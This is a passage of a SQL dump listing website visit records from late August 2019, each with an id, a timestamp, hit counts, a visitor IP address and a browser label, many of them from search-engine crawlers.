1566955788,1,1,0,0,'207.46.13.228','other'),(445227,1566956424,1,1,0,0,'40.77.167.12','other'),(445228,1566956905,1,1,0,0,'87.250.224.65','other'),(445229,1566956907,1,1,0,0,'34.216.109.85','other'),(445230,1566956912,1,1,0,0,'5.45.207.19','other'),(445231,1566956964,1,1,0,0,'157.55.39.56','other'),(445232,1566957407,1,1,0,0,'186.251.166.236','chrome'),(445233,1566958436,2,2,0,0,'66.249.66.136','chrome'),(445234,1566960701,1,1,0,0,'51.68.152.26','chrome'),(445235,1566961201,1,1,0,0,'207.46.13.228','other'),(445236,1566961826,1,1,0,0,'8.29.198.26','other'),(445237,1566961924,1,1,0,0,'46.211.43.236','chrome'),(445238,1566962294,1,1,0,0,'141.8.188.11','other'),(445239,1566962295,1,1,0,0,'5.45.207.79','other'),(445240,1566962298,1,1,0,0,'141.8.188.29','other'),(445241,1566962727,1,1,0,0,'37.9.113.103','other'),(445242,1566963449,1,1,0,0,'207.46.13.175','other'),(445243,1566963555,1,1,0,0,'91.209.11.236','other'),(445244,1566963753,1,1,0,0,'8.29.198.26','other'),(445245,1566963904,1,1,0,0,'141.8.142.103','other'),(445246,1566964104,1,1,0,0,'66.249.66.136','chrome'),(445247,1566964465,1,1,0,0,'58.8.173.50','chrome'),(445248,1566964928,1,1,0,0,'91.209.11.236','other'),(445249,1566966786,1,1,0,0,'202.142.71.172','chrome'),(445250,1566968439,1,1,0,0,'207.46.13.228','other'),(445251,1566968818,1,1,0,0,'66.249.66.136','chrome'),(445252,1566969153,2,2,0,0,'141.8.188.29','other'),(445253,1566969306,1,1,0,0,'40.77.167.125','other'),(445254,1566969604,1,1,0,0,'157.55.39.131','other'),(445255,1566969959,1,1,0,0,'66.249.66.134','chrome'),(445256,1566970176,1,1,0,0,'141.8.188.29','other'),(445257,1566971364,1,1,0,0,'157.55.39.86','other'),(445258,1566971379,1,1,0,0,'37.9.113.148','other'),(445259,1566972657,1,1,0,0,'8.29.198.25','other'),(445260,1566974503,1,1,0,0,'66.249.66.66','chrome'),(445261,1566974592,1,1,0,0,'8.29.198.26','other'),(445262,1566974773,1,1,0,0,'95.132.36.83','firefox'),(445263,1566974927,2,2,0,0,'157.55.39.86','other'),(445264,1566974966,1,1,0,0,'95.132.36.83','chrome'),(445265,1566974969,1,1,0,0,'141.8.188.11','other'),(445266,1566975606,1,1,0,0,'66.249.66.134','chrome'),(445267,1566975843,1,1,0,0,'13.66.139.0','other'),(445268,1566976086,1,1,0,0,'37.150.25.77','chrome'),(445269,1566976163,1,1,0,0,'157.55.39.91','other'),(445270,1566976397,1,1,0,0,'213.108.45.138','chrome'),(445271,1566976508,1,1,0,0,'66.249.66.136','chrome'),(445272,1566976705,1,1,0,0,'91.196.177.46','chrome'),(445273,1566976713,1,1,0,0,'141.8.142.103','other'),(445274,1566976959,1,1,0,0,'141.8.188.29','other'),(445275,1566977081,1,1,0,0,'157.55.39.91','other'),(445276,1566977085,4,4,0,0,'157.55.39.86','other'),(445277,1566977091,1,1,0,0,'207.46.13.228','other'),(445278,1566978279,1,1,0,0,'157.55.39.91','other'),(445279,1566978978,1,1,0,0,'37.53.90.175','chrome'),(445280,1566979872,1,1,0,0,'157.55.39.86','other'),(445281,1566979936,1,1,0,0,'46.211.40.236','chrome'),(445282,1566980356,3,3,0,0,'66.249.66.136','chrome'),(445283,1566980608,3,3,0,0,'157.55.39.91','other'),(445284,1566981075,1,1,0,0,'66.249.66.134','chrome'),(445285,1566981598,1,1,0,0,'95.135.213.67','firefox'),(445286,1566982081,1,1,0,0,'66.249.66.134','chrome'),(445287,1566982217,1,1,0,0,'157.55.39.91','other'),(445288,1566982427,1,1,0,0,'141.8.188.11','other'),(445289,1566983280,1,1,0,0,'40.77.167.81','other'),(445290,1566983486,1,1,0,0,'8.29.198.26','other'),(445291,1566983665,1,1,0,0,'95.108.213.4','other'),(445292,1566984718,1,1,0,0,'40.77.167.150','other'),(445293,1566985252,1,1,0,0,'62.244.60.90','chrome'),(445294,1566985438,1,1,0,0,'8.29.198.27','other'),(445295,1566985485,1,1,0,0,'40.77.167.81','other'),(445296,1566985736,1,1,0,0,'40.77.167.150','other'),(445297,1566986913,1,1,0,0,'37.53.90.175','chrome'),(445298,1566986963,1,1,0,0,'141.8.188.11','other'),(445299,1566986965,1,1,0,0,'40.77.167.150','other'),(445300,1566987242,1,1,0,0,'66.249.66.136','chrome'),(445301,1566987262,1,1,0,0,'66.249.66.134','chrome'),(445302,1566988005,1,1,0,0,'209.17.96.74','other'),(445303,1566988384,1,1,0,0,'40.77.167.150','other'),(445304,1566988441,1,1,0,0,'46.211.135.3','chrome'),(445305,1566988500,1,1,0,0,'95.108.213.4','other'),(445306,1566988927,2,2,0,0,'95.213.141.126','opera'),(445307,1566989627,1,1,0,0,'207.46.13.128','other'),(445308,1566990822,1,1,0,0,'66.249.66.134','chrome'),(445309,1566991577,1,1,0,0,'109.74.154.72','chrome'),(445310,1566991883,1,1,0,0,'35.187.132.29','msie'),(445311,1566992290,1,1,0,0,'46.211.73.87','chrome'),(445312,1566992471,1,1,0,0,'91.196.178.179','chrome'),(445313,1566992543,2,2,0,0,'66.249.66.138','chrome'),(445314,1566992844,1,1,0,0,'66.249.66.134','chrome'),(445315,1566992903,1,1,0,0,'46.159.207.67','chrome'),(445316,1566992990,1,1,0,0,'40.77.167.54','other'),(445317,1566992995,2,2,0,0,'157.55.39.81','other'),(445318,1566993029,1,1,0,0,'207.46.13.181','other'),(445319,1566993356,1,1,0,0,'40.77.167.138','other'),(445320,1566993428,1,1,0,0,'91.196.178.179','chrome'),(445321,1566993496,2,2,0,0,'66.249.66.138','chrome'),(445322,1566993706,1,1,0,0,'37.52.152.96','chrome'),(445323,1566994106,1,1,0,0,'66.249.66.136','chrome'),(445324,1566994326,1,1,0,0,'8.29.198.25','other'),(445325,1566995034,1,1,0,0,'185.185.254.27','chrome'),(445326,1566995210,1,1,0,0,'66.249.66.136','chrome'),(445327,1566995303,1,1,0,0,'66.249.66.134','chrome'),(445328,1566996117,2,2,0,0,'66.249.66.136','chrome'),(445329,1566996157,1,1,0,0,'40.77.167.112','other'),(445330,1566996275,1,1,0,0,'8.29.198.25','other'),(445331,1566996556,1,1,0,0,'178.133.197.19','chrome'),(445332,1566996561,1,1,0,0,'66.249.88.94','chrome'),(445333,1566996570,2,2,0,0,'66.249.83.202','chrome'),(445334,1566996571,1,1,0,0,'66.249.83.200','chrome'),(445335,1566996664,2,2,0,0,'65.154.226.126','chrome'),(445336,1566997436,2,2,0,0,'141.8.188.29','other'),(445337,1566997482,1,1,0,0,'5.45.207.19','other'),(445338,1566997560,1,1,0,0,'91.196.178.85','chrome'),(445339,1566998202,1,1,0,0,'66.249.66.68','chrome'),(445340,1566998502,1,1,0,0,'40.77.167.138','other'),(445341,1566998960,1,1,0,0,'193.106.30.99','chrome'),(445342,1566999032,1,1,0,0,'141.8.132.16','other'),(445343,1566999111,1,1,0,0,'66.249.66.138','chrome'),(445344,1566999677,1,1,0,0,'91.196.179.69','chrome'),(445345,1566999875,1,1,0,0,'91.196.178.136','firefox'),(445346,1566999928,3,3,0,0,'40.77.167.112','other'),(445347,1567000214,1,1,0,0,'141.8.188.29','other'),(445348,1567000530,3,3,0,0,'66.249.66.134','chrome'),(445349,1567001083,2,2,0,0,'40.77.167.112','other'),(445350,1567001164,1,1,0,0,'66.249.66.138','chrome'),(445351,1567001205,1,1,0,0,'66.249.66.136','chrome'),(445352,1567001526,1,1,0,0,'207.46.13.181','other'),(445353,1567001979,1,1,0,0,'91.196.179.138','chrome'),(445354,1567002013,1,1,0,0,'209.17.96.210','other'),(445355,1567002592,1,1,0,0,'37.204.201.114','msie'),(445356,1567002888,1,1,0,0,'141.8.188.29','other'),(445357,1567004240,2,2,0,0,'207.46.13.137','other'),(445358,1567004599,2,2,0,0,'66.249.66.136','chrome'),(445359,1567004953,1,1,0,0,'46.211.46.59','chrome'),(445360,1567005164,1,1,0,0,'8.29.198.25','other'),(445361,1567005454,2,2,0,0,'141.8.188.29','other'),(445362,1567006300,1,1,0,0,'207.46.13.137','other'),(445363,1567006573,1,1,0,0,'66.249.66.134','chrome'),(445364,1567006625,1,1,0,0,'66.249.66.138','chrome'),(445365,1567007127,1,1,0,0,'8.29.198.27','other'),(445366,1567007243,1,1,0,0,'40.77.167.112','other'),(445367,1567007262,1,1,0,0,'40.77.167.138','other'),(445368,1567007498,1,1,0,0,'46.211.120.219','chrome'),(445369,1567008532,1,1,0,0,'91.196.178.81','firefox'),(445370,1567008557,1,1,0,0,'46.211.120.219','chrome'),(445371,1567009457,1,1,0,0,'207.46.13.76','other'),(445372,1567010395,1,1,0,0,'207.46.13.181','other'),(445373,1567010461,1,1,0,0,'66.249.66.138','chrome'),(445374,1567010537,1,1,0,0,'159.65.43.59','chrome'),(445375,1567011357,1,1,0,0,'207.46.13.73','other'),(445376,1567011613,1,1,0,0,'141.8.188.11','other'),(445377,1567011615,1,1,0,0,'66.249.66.134','chrome'),(445378,1567012889,1,1,0,0,'207.46.13.16','other'),(445379,1567013236,1,1,0,0,'91.196.178.132','firefox'),(445380,1567014046,1,1,0,0,'207.46.13.181','other'),(445381,1567014053,1,1,0,0,'207.46.13.76','other'),(445382,1567014330,1,1,0,0,'66.249.66.66','chrome'),(445383,1567015275,2,2,0,0,'66.249.66.136','chrome'),(445384,1567015613,1,1,0,0,'87.250.224.65','other'),(445385,1567015838,1,1,0,0,'66.249.66.64','chrome'),(445386,1567015934,1,1,0,0,'207.46.13.181','other'),(445387,1567015996,1,1,0,0,'8.29.198.27','other'),(445388,1567016184,1,1,0,0,'66.249.66.66','chrome'),(445389,1567016264,1,1,0,0,'35.187.132.29','msie'),(445390,1567016834,1,1,0,0,'66.249.66.138','chrome'),(445391,1567016909,1,1,0,0,'141.8.142.103','other'),(445392,1567016913,1,1,0,0,'87.250.224.65','other'),(445393,1567016932,1,1,0,0,'207.46.13.76','other'),(445394,1567017029,1,1,0,0,'95.164.73.37','chrome'),(445395,1567017642,1,1,0,0,'13.66.139.0','other'),(445396,1567017978,1,1,0,0,'8.29.198.26','other'),(445397,1567018015,1,1,0,0,'66.249.66.138','chrome'),(445398,1567018032,1,1,0,0,'141.8.188.11','other'),(445399,1567018046,1,1,0,0,'66.249.66.68','chrome'),(445400,1567018064,2,2,0,0,'66.249.66.134','chrome'),(445401,1567019288,1,1,0,0,'5.45.207.79','other'),(445402,1567019685,2,2,0,0,'66.249.66.136','chrome'),(445403,1567019858,1,1,0,0,'66.249.66.138','chrome'),(445404,1567021493,1,1,0,0,'66.249.66.134','chrome'),(445405,1567022551,3,3,0,0,'66.249.66.134','chrome'),(445406,1567023300,1,1,0,0,'5.45.207.79','other'),(445407,1567023544,1,1,0,0,'66.249.66.138','chrome'),(445408,1567023964,2,2,0,0,'157.55.39.123','other'),(445409,1567024321,1,1,0,0,'66.249.66.136','chrome'),(445410,1567024526,2,2,0,0,'207.46.13.32','other'),(445411,1567024532,2,2,0,0,'207.46.13.76','other'),(445412,1567026330,1,1,0,0,'141.8.188.29','other'),(445413,1567026633,1,1,0,0,'207.46.13.76','other'),(445414,1567026824,1,1,0,0,'8.29.198.27','other'),(445415,1567027122,2,2,0,0,'66.249.66.134','chrome'),(445416,1567027511,1,1,0,0,'141.8.142.103','other'),(445417,1567028065,3,3,0,0,'66.249.66.134','chrome'),(445418,1567028659,1,1,0,0,'157.55.39.123','other'),(445419,1567028666,1,1,0,0,'207.46.13.76','other'),(445420,1567028838,1,1,0,0,'8.29.198.27','other'),(445421,1567030286,1,1,0,0,'37.9.113.148','other'),(445422,1567030545,1,1,0,0,'207.46.13.32','other'),(445423,1567031515,1,1,0,0,'5.45.207.79','other'),(445424,1567031562,1,1,0,0,'141.8.188.11','other'),(445425,1567032176,1,1,0,0,'157.55.39.123','other'),(445426,1567032583,1,1,0,0,'66.249.66.136','chrome'),(445427,1567032906,1,1,0,0,'95.108.213.4','other'),(445428,1567033068,1,1,0,0,'207.46.13.32','other'),(445429,1567033328,1,1,0,0,'66.249.66.138','chrome'),(445430,1567033399,1,1,0,0,'157.55.39.123','other'),(445431,1567034081,2,2,0,0,'66.249.66.134','chrome'),(445432,1567034354,1,1,0,0,'66.249.66.136','chrome'),(445433,1567035785,1,1,0,0,'141.8.188.29','other'),(445434,1567036255,36,36,0,0,'173.212.229.76','other'),(445435,1567036316,1,1,0,0,'66.249.66.134','chrome'),(445436,1567037160,55,55,0,0,'173.212.229.76','other'),(445437,1567037187,1,1,0,0,'141.8.188.29','other'),(445438,1567037658,1,1,0,0,'8.29.198.25','other'),(445439,1567037946,1,1,0,0,'66.249.66.138','chrome'),(445440,1567038077,26,26,0,0,'173.212.229.76','other'),(445441,1567038432,3,3,0,0,'66.249.66.136','chrome'),(445442,1567038675,1,1,0,0,'66.249.66.134','chrome'),(445443,1567038748,1,1,0,0,'157.55.39.118','other'),(445444,1567038754,1,1,0,0,'207.46.13.32','other'),(445445,1567039101,1,1,0,0,'141.8.188.11','other'),(445446,1567039696,1,1,0,0,'8.29.198.25','other'),(445447,1567040790,2,2,0,0,'207.46.13.32','other'),(445448,1567040941,1,1,0,0,'66.249.66.136','chrome'),(445449,1567044351,1,1,0,0,'207.46.13.32','other'),(445450,1567044365,1,1,0,0,'66.249.66.134','chrome'),(445451,1567044709,1,1,0,0,'66.249.66.138','chrome'),(445452,1567044928,98,98,0,0,'88.198.33.145','other'),(445453,1567045190,1,1,0,0,'157.55.39.118','other'),(445454,1567045749,1,1,0,0,'54.212.164.2','other'),(445455,1567046526,1,1,0,0,'66.249.66.134','chrome'),(445456,1567046548,1,1,0,0,'157.55.39.241','other'),(445457,1567046945,1,1,0,0,'141.8.188.11','other'),(445458,1567047063,1,1,0,0,'66.249.66.136','chrome'),(445459,1567047094,37,37,0,0,'192.99.13.228','other'),(445460,1567047149,1,1,0,0,'40.77.167.34','other'),(445461,1567047581,1,1,0,0,'66.249.66.134','chrome'),(445462,1567047971,1,1,0,0,'141.8.188.11','other'),(445463,1567048002,40,40,0,0,'192.99.13.228','other'),(445464,1567048487,1,1,0,0,'8.29.198.26','other'),(445465,1567048907,44,44,0,0,'192.99.13.228','other'),(445466,1567048959,1,1,0,0,'141.8.188.29','other'),(445467,1567049194,1,1,0,0,'66.249.66.136','chrome'),(445468,1567049382,1,1,0,0,'46.211.133.87','chrome'),(445469,1567050126,42,42,0,0,'192.99.13.228','other'),(445470,1567050534,1,1,0,0,'8.29.198.25','other'),(445471,1567050619,1,1,0,0,'66.249.66.138','chrome'),(445472,1567050826,1,1,0,0,'66.249.66.136','chrome'),(445473,1567051041,24,24,0,0,'192.99.13.228','other'),(445474,1567051609,1,1,0,0,'5.45.207.79','other'),(445475,1567052240,1,1,0,0,'66.249.66.136','chrome'),(445476,1567052942,1,1,0,0,'157.55.39.241','other'),(445477,1567053525,1,1,0,0,'207.46.13.124','other'),(445478,1567053654,7,7,0,0,'138.68.180.18','chrome'),(445479,1567054854,1,1,0,0,'207.46.13.15','other'),(445480,1567055420,1,1,0,0,'66.249.66.134','chrome'),(445481,1567055659,2,2,0,0,'13.66.139.0','other'),(445482,1567055758,1,1,0,0,'185.138.228.2','chrome'),(445483,1567056327,1,1,0,0,'66.249.66.138','chrome'),(445484,1567056380,1,1,0,0,'66.249.66.66','chrome'),(445485,1567056382,1,0,1,0,'66.249.66.68',''),(445486,1567057550,1,1,0,0,'141.8.188.29','other'),(445487,1567057697,1,1,0,0,'66.102.9.30','chrome'),(445488,1567058172,1,1,0,0,'141.8.142.38','other'),(445489,1567058336,1,1,0,0,'46.219.2.9','chrome'),(445490,1567059092,1,1,0,0,'66.249.66.136','chrome'),(445491,1567059323,1,1,0,0,'8.29.198.27','other'),(445492,1567059837,1,1,0,0,'46.219.2.9','chrome'),(445493,1567059906,1,1,0,0,'37.9.113.20','other'),(445494,1567060389,1,1,0,0,'40.77.167.126','other'),(445495,1567060511,1,1,0,0,'37.53.90.175','chrome'),(445496,1567061370,1,1,0,0,'8.29.198.25','other'),(445497,1567061592,1,1,0,0,'207.46.13.15','other'),(445498,1567061631,1,1,0,0,'66.249.66.136','chrome'),(445499,1567061894,1,1,0,0,'91.209.11.236','other'),(445500,1567063436,1,1,0,0,'40.77.167.126','other'),(445501,1567063440,3,3,0,0,'207.46.13.15','other'),(445502,1567063446,1,1,0,0,'207.46.13.124','other'),(445503,1567063517,3,3,0,0,'66.249.66.136','chrome'),(445504,1567063722,1,1,0,0,'66.249.66.138','chrome'),(445505,1567064245,1,1,0,0,'178.173.241.39','chrome'),(445506,1567064618,1,1,0,0,'95.108.213.4','other'),(445507,1567064856,17,17,0,0,'88.99.244.56','other'),(445508,1567064922,1,1,0,0,'46.201.174.82','chrome'),(445509,1567065069,1,1,0,0,'66.249.66.138','chrome'),(445510,1567065496,1,1,0,0,'66.249.66.68','chrome'),(445511,1567065682,1,1,0,0,'66.249.66.136','chrome'),(445512,1567065770,18,18,0,0,'88.99.244.56','other'),(445513,1567065891,1,1,0,0,'66.249.66.134','chrome'),(445514,1567066701,18,18,0,0,'88.99.244.56','other'),(445515,1567066895,1,1,0,0,'66.249.66.138','chrome'),(445516,1567067628,18,18,0,0,'88.99.244.56','other'),(445517,1567067710,1,1,0,0,'40.77.167.166','other'),(445518,1567068027,1,1,0,0,'66.249.66.134','chrome'),(445519,1567068545,1,1,0,0,'207.46.13.124','other'),(445520,1567068559,18,18,0,0,'88.99.244.56','other'),(445521,1567069235,1,1,0,0,'178.154.171.27','other'),(445522,1567069383,1,1,0,0,'141.8.188.29','other'),(445523,1567069478,18,18,0,0,'88.99.244.56','other'),(445524,1567069572,1,1,0,0,'40.77.167.50','other'),(445525,1567069638,1,1,0,0,'66.249.66.138','chrome'),(445526,1567069754,1,1,0,0,'66.249.66.136','chrome'),(445527,1567069815,2,2,0,0,'66.249.66.66','chrome'),(445528,1567070150,1,1,0,0,'8.29.198.25','other'),(445529,1567070427,16,16,0,0,'88.99.244.56','other'),(445530,1567071358,17,17,0,0,'88.99.244.56','other'),(445531,1567071824,1,1,0,0,'40.77.167.50','other'),(445532,1567072212,1,1,0,0,'8.29.198.26','other'),(445533,1567072267,18,18,0,0,'88.99.244.56','other'),(445534,1567072352,1,1,0,0,'66.249.66.134','chrome'),(445535,1567072390,1,1,0,0,'141.8.142.38','other'),(445536,1567073214,17,17,0,0,'88.99.244.56','other'),(445537,1567073461,3,3,0,0,'40.77.167.5','other'),(445538,1567073471,1,1,0,0,'46.211.120.229','chrome'),(445539,1567073933,1,1,0,0,'141.8.188.11','other'),(445540,1567074149,19,19,0,0,'88.99.244.56','other'),(445541,1567074287,1,1,0,0,'13.66.139.0','other'),(445542,1567074309,1,1,0,0,'66.249.66.134','chrome'),(445543,1567074310,1,1,0,0,'95.134.15.22','chrome'),(445544,1567074648,1,1,0,0,'40.77.167.5','other'),(445545,1567074737,1,1,0,0,'141.8.188.29','other'),(445546,1567075069,18,18,0,0,'88.99.244.56','other'),(445547,1567075281,1,1,0,0,'66.102.6.249','chrome'),(445548,1567075912,1,1,0,0,'40.77.167.50','other'),(445549,1567076031,19,19,0,0,'88.99.244.56','other'),(445550,1567076245,1,1,0,0,'91.196.177.93','chrome'),(445551,1567076713,1,1,0,0,'193.106.30.99','chrome'),(445552,1567076718,1,1,0,0,'141.8.188.29','other'),(445553,1567076721,1,1,0,0,'46.211.134.0','chrome'),(445554,1567076758,1,1,0,0,'141.8.188.11','other'),(445555,1567076986,17,17,0,0,'88.99.244.56','other'),(445556,1567077639,1,1,0,0,'95.134.15.22','chrome'),(445557,1567077755,2,2,0,0,'40.77.167.117','other'),(445558,1567077932,2,2,0,0,'40.77.167.50','other'),(445559,1567077936,18,18,0,0,'88.99.244.56','other'),(445560,1567078305,1,1,0,0,'141.8.188.11','other'),(445561,1567078842,1,1,0,0,'109.74.154.72','chrome'),(445562,1567078859,16,16,0,0,'88.99.244.56','other'),(445563,1567078947,2,2,0,0,'40.77.167.137','other'),(445564,1567078996,1,1,0,0,'40.77.167.117','other'),(445565,1567079764,17,17,0,0,'88.99.244.56','other'),(445566,1567080665,18,18,0,0,'88.99.244.56','other'),(445567,1567080979,1,1,0,0,'8.29.198.27','other'),(445568,1567081156,1,1,0,0,'141.8.188.29','other'),(445569,1567081654,18,18,0,0,'88.99.244.56','other'),(445570,1567082600,18,18,0,0,'88.99.244.56','other'),(445571,1567082714,1,1,0,0,'157.55.39.74','other'),(445572,1567082931,1,1,0,0,'141.8.188.29','other'),(445573,1567083063,1,1,0,0,'8.29.198.26','other'),(445574,1567083566,19,19,0,0,'88.99.244.56','other'),(445575,1567083899,1,1,0,0,'157.55.39.74','other'),(445576,1567084540,17,17,0,0,'88.99.244.56','other'),(445577,1567084865,2,2,0,0,'141.8.188.29','other'),(445578,1567085142,1,1,0,0,'66.249.66.64','chrome'),(445579,1567085440,1,1,0,0,'66.249.66.138','chrome'),(445580,1567085483,18,18,0,0,'88.99.244.56','other'),(445581,1567085607,1,1,0,0,'66.249.66.136','chrome'),(445582,1567085855,2,2,0,0,'141.8.188.11','other'),(445583,1567086089,1,1,0,0,'87.250.224.118','other'),(445584,1567086362,1,1,0,0,'66.249.66.66','chrome'),(445585,1567086421,17,17,0,0,'88.99.244.56','other'),(445586,1567086552,2,2,0,0,'66.249.66.140','chrome'),(445587,1567086681,5,5,0,0,'66.249.66.138','chrome'),(445588,1567086948,2,2,0,0,'66.249.66.136','chrome'),(445589,1567087032,7,7,0,0,'66.249.66.134','chrome'),(445590,1567087385,17,17,0,0,'88.99.244.56','other'),(445591,1567087940,1,1,0,0,'66.249.66.136','chrome'),(445592,1567088082,1,1,0,0,'40.77.167.159','other'),(445593,1567088124,1,1,0,0,'37.9.113.20','other'),(445594,1567088294,17,17,0,0,'88.99.244.56','other'),(445595,1567088296,1,1,0,0,'66.249.66.134','chrome'),(445596,1567089222,17,17,0,0,'88.99.244.56','other'),(445597,1567090097,1,1,0,0,'66.249.66.134','chrome'),(445598,1567090141,17,17,0,0,'88.99.244.56','other'),(445599,1567090152,1,1,0,0,'62.80.166.58','chrome'),(445600,1567090571,1,1,0,0,'66.249.66.136','chrome'),(445601,1567090573,1,1,0,0,'66.249.66.138','chrome'),(445602,1567091088,17,17,0,0,'88.99.244.56','other'),(445603,1567091819,1,1,0,0,'8.29.198.25','other'),(445604,1567091991,16,16,0,0,'88.99.244.56','other'),(445605,1567092797,1,1,0,0,'157.55.39.74','other'),(445606,1567092921,17,17,0,0,'88.99.244.56','other'),(445607,1567093899,15,15,0,0,'88.99.244.56','other'),(445608,1567093934,1,1,0,0,'8.29.198.25','other'),(445609,1567094240,1,1,0,0,'157.55.39.222','other'),(445610,1567094537,1,1,0,0,'40.77.167.46','other'),(445611,1567094851,17,17,0,0,'88.99.244.56','other'),(445612,1567094860,1,1,0,0,'66.249.66.136','chrome'),(445613,1567095482,1,1,0,0,'40.77.167.159','other'),(445614,1567095569,1,1,0,0,'91.242.199.123','chrome'),(445615,1567095832,16,16,0,0,'88.99.244.56','other'),(445616,1567096745,16,16,0,0,'88.99.244.56','other'),(445617,1567097118,1,1,0,0,'157.55.39.187','other'),(445618,1567097413,1,1,0,0,'66.249.66.66','chrome'),(445619,1567097648,1,1,0,0,'157.55.39.74','other'),(445620,1567097678,17,17,0,0,'88.99.244.56','other'),(445621,1567098172,1,1,0,0,'5.164.132.60','msie'),(445622,1567098173,1,1,0,0,'46.0.34.9','msie'),(445623,1567098491,1,1,0,0,'157.55.39.222','other'),(445624,1567098609,1,1,0,0,'95.108.181.75','other'),(445625,1567098633,17,17,0,0,'88.99.244.56','other'),(445626,1567098749,2,2,0,0,'66.249.66.134','chrome'),(445627,1567098880,1,1,0,0,'66.249.66.136','chrome'),(445628,1567099596,16,16,0,0,'88.99.244.56','other'),(445629,1567100538,16,16,0,0,'88.99.244.56','other'),(445630,1567101170,1,1,0,0,'141.8.188.29','other'),(445631,1567101297,1,1,0,0,'5.188.84.76','chrome'),(445632,1567101459,17,17,0,0,'88.99.244.56','other'),(445633,1567102108,1,1,0,0,'40.77.167.62','other'),(445634,1567102211,1,1,0,0,'207.46.13.107','other'),(445635,1567102328,1,1,0,0,'46.211.129.226','other'),(445636,1567102414,16,16,0,0,'88.99.244.56','other'),(445637,1567102436,2,2,0,0,'66.249.66.138','chrome'),(445638,1567102506,1,1,0,0,'141.8.142.103','other'),(445639,1567102652,1,1,0,0,'8.29.198.25','other'),(445640,1567103321,17,17,0,0,'88.99.244.56','other'),(445641,1567103333,1,1,0,0,'141.8.188.11','other'),(445642,1567103437,2,2,0,0,'141.8.188.29','other'),(445643,1567103529,1,1,0,0,'207.46.13.107','other'),(445644,1567103566,1,1,0,0,'40.77.167.62','other'),(445645,1567103949,1,1,0,0,'87.250.224.81','other'),(445646,1567104051,2,2,0,0,'66.249.66.136','chrome'),(445647,1567104265,17,17,0,0,'88.99.244.56','other'),(445648,1567104303,2,2,0,0,'157.55.39.74','other'),(445649,1567104643,1,1,0,0,'193.106.30.99','chrome'),(445650,1567104797,1,1,0,0,'8.29.198.25','other'),(445651,1567105108,1,1,0,0,'141.8.188.11','other'),(445652,1567105181,16,16,0,0,'88.99.244.56','other'),(445653,1567106098,16,16,0,0,'88.99.244.56','other'),(445654,1567107057,17,17,0,0,'88.99.244.56','other'),(445655,1567107179,2,2,0,0,'141.8.188.29','other'),(445656,1567107480,1,1,0,0,'157.55.39.48','other'),(445657,1567108015,1,1,0,0,'91.196.178.99','chrome'),(445658,1567108031,16,16,0,0,'88.99.244.56','other'),(445659,1567108438,1,1,0,0,'66.249.66.136','chrome'),(445660,1567108562,1,1,0,0,'66.249.66.138','chrome'),(445661,1567108934,16,16,0,0,'88.99.244.56','other'),(445662,1567109655,1,1,0,0,'207.46.13.138','other'),(445663,1567109887,16,16,0,0,'88.99.244.56','other'),(445664,1567110823,17,17,0,0,'88.99.244.56','other'),(445665,1567110829,1,1,0,0,'66.249.66.64','chrome'),(445666,1567110905,2,2,0,0,'66.249.66.136','chrome'),(445667,1567111140,1,1,0,0,'66.249.66.134','chrome'),(445668,1567111654,1,1,0,0,'66.249.66.138','chrome'),(445669,1567111748,1,1,0,0,'141.8.188.11','other'),(445670,1567111768,17,17,0,0,'88.99.244.56','other'),(445671,1567112269,3,3,0,0,'66.249.66.134','chrome'),(445672,1567112357,1,1,0,0,'66.249.66.66','chrome'),(445673,1567112724,17,17,0,0,'88.99.244.56','other'),(445674,1567112947,1,1,0,0,'207.46.13.18','other'),(445675,1567112957,1,1,0,0,'207.46.13.205','other'),(445676,1567113492,1,1,0,0,'8.29.198.26','other'),(445677,1567113691,15,15,0,0,'88.99.244.56','other'),(445678,1567114636,16,16,0,0,'88.99.244.56','other'),(445679,1567115271,1,1,0,0,'66.249.66.134','chrome'),(445680,1567115558,10,10,0,0,'88.99.244.56','other'),(445681,1567115637,1,1,0,0,'8.29.198.27','other'),(445682,1567115664,1,1,0,0,'207.46.13.247','other'),(445683,1567116229,1,1,0,0,'209.17.97.34','other'),(445684,1567117206,1,1,0,0,'141.8.188.29','other'),(445685,1567117408,3,3,0,0,'66.249.66.134','chrome'),(445686,1567117993,1,1,0,0,'66.249.66.64','chrome'),(445687,1567118105,1,1,0,0,'66.249.66.68','chrome'),(445688,1567118796,2,2,0,0,'40.77.167.120','other'),(445689,1567119610,1,1,0,0,'40.77.167.46','other'),(445690,1567122682,1,1,0,0,'66.249.66.220','chrome'),(445691,1567122943,1,1,0,0,'207.46.13.32','other'),(445692,1567122958,1,1,0,0,'40.77.167.46','other'),(445693,1567122984,2,2,0,0,'141.8.188.11','other'),(445694,1567123867,1,1,0,0,'66.249.66.220','chrome'),(445695,1567123968,1,1,0,0,'141.8.188.29','other'),(445696,1567124328,1,1,0,0,'8.29.198.25','other'),(445697,1567124375,1,1,0,0,'157.55.39.255','other'),(445698,1567124551,1,1,0,0,'207.46.13.32','other'),(445699,1567124952,1,1,0,0,'141.8.188.29','other'),(445700,1567125771,1,1,0,0,'157.55.39.255','other'),(445701,1567125976,1,1,0,0,'141.8.188.11','other'),(445702,1567126413,1,1,0,0,'141.8.188.29','other'),(445703,1567126470,1,1,0,0,'66.249.66.218','chrome'),(445704,1567126485,1,1,0,0,'8.29.198.26','other'),(445705,1567127487,1,1,0,0,'141.8.188.11','other'),(445706,1567127562,1,1,0,0,'157.55.39.255','other'),(445707,1567128126,1,1,0,0,'66.249.66.218','chrome'),(445708,1567129687,1,1,0,0,'207.46.13.32','other'),(445709,1567130876,1,1,0,0,'207.46.13.151','other'),(445710,1567131621,1,1,0,0,'66.249.66.220','chrome'),(445711,1567132237,1,1,0,0,'207.46.13.151','other'),(445712,1567132757,1,1,0,0,'46.211.4.5','chrome'),(445713,1567132913,2,2,0,0,'66.249.66.220','chrome'),(445714,1567132932,1,1,0,0,'5.45.207.8','other'),(445715,1567133060,1,1,0,0,'17.58.97.174','other'),(445716,1567133590,1,1,0,0,'213.180.203.9','other'),(445717,1567133801,1,1,0,0,'157.55.39.255','other'),(445718,1567134678,1,1,0,0,'66.249.66.218','chrome'),(445719,1567134787,1,1,0,0,'157.55.39.255','other'),(445720,1567135165,1,1,0,0,'8.29.198.27','other'),(445721,1567135253,1,1,0,0,'141.8.142.103','other'),(445722,1567135489,1,1,0,0,'178.154.171.24','other'),(445723,1567135988,2,2,0,0,'66.249.66.220','chrome'),(445724,1567136384,1,1,0,0,'5.45.207.79','other'),(445725,1567137095,1,1,0,0,'66.249.66.218','chrome'),(445726,1567137333,1,1,0,0,'8.29.198.27','other'),(445727,1567137944,1,1,0,0,'157.55.39.73','other'),(445728,1567138121,1,1,0,0,'66.249.66.220','chrome'),(445729,1567138221,1,1,0,0,'37.9.113.103','other'),(445730,1567138389,1,